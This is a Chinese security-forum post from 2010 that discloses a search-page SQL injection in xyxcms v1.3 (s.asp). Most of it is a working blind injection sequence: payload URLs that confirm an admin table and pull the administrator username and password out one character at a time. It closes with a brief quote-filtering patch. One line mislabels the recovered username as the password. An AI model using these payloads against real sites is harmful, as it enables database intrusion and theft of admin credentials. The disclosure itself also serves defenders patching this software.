【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: xyxcms v1.3 搜索注入漏洞 [打印本页]

作者: hyrz 时间: 2010-6-22 14:54 标题: xyxcms v1.3 搜索注入漏洞

发布日期：2010-06.19
发布作者：mars
影响版本：xyxcms v1.3
官方地址： www.xyxcms.com
漏洞描述：搜索页面代码过滤不严，导致字符串搜索型注入。
代码分析：s.asp 从这段代码可以看出字符串搜索注入~


k=request.QueryString("k")  page=request.QueryString("page")  if page="" or isnumeric(page)=0 then g_cur_page=1 else  g_cur_page=cint(page) end if

漏洞测试利用方法：

http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT CoUNt(*) FrOM admin)>=0 AnD '%25'='  猜解数据库为admin
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT CoUNt(*) FrOM admin)=1 AnD '%25'='  判断管理员就1个
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT CoUNt(*) FrOM admin Where len(username)=4)=1 AnD '%25'=' 管理员账户长度为4位
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT CoUNt(*) FrOM admin Where len(password)=8)=1 AnD '%25'=' 管理员密码长度为8位

username长度是4

http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(username,1,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=109 AnD '%25'=' 用户第一位是m
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(username,2,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=97 AnD '%25'='  用户第二位是a
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(username,3,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=114 AnD '%25'='  用户第三位是r
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(username,4,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=115 AnD '%25'='  用户第四位是s

所以密码是mars

password长度为8

http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,1,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=49 AnD '%25'=' 密码第一位是1
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,2,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=50 AnD '%25'=' 密码第二位是2
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,3,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=51 AnD '%25'=' 密码第三位是3
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,4,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=52 AnD '%25'=' 密码第四位是4
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,5,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=113 AnD '%25'=' 密码第五位是q
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,6,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=119 AnD '%25'=' 密码第六位是w
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,7,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=113 AnD '%25'=' 密码第七位是q
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,8,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=119 AnD '%25'=' 密码第八位是w

所以密码是1234qwqw

漏洞修补方法过滤掉' 就行了

k=request.QueryString("k") if instr(k,"'")>0 response.Write "<script>alert('error');window.close();</script>" response.End() end if page=request.QueryString("page") if page="" or isnumeric(page)=0 then g_cur_page=1  else g_cur_page=cint(page) end if

欢迎光临【3.A.S.T】网络安全爱好者 (http://3ast.com/)